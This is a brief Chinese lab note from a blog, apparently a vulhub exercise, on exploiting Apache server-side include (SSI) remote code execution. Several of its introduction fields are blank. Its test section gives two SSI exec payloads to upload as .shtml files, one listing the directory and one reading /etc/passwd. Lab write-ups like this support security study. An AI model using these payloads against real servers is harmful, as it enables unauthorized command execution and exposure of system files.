服务器容器漏洞-apache ssi-rce

(191条消息) vulhub-httpd-ssi-rce_vulfocus/httpd-ssi_浅陌.的博客-CSDN博客

1、介绍

名称:apache ssi-rce漏洞

编号:

原理:

应用:apache

版本:

2、测试

2.1 靶场搭建

2.2 测试过程

(1)上传shell.shtml

<!--#exec cmd="ls&pwd"-->

(2)上传新的shl.shtml,出现密码说明远程代码执行成功

<!--#exec cmd="cat /etc/passwd"-->

posted @   挖洞404  阅读(34)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示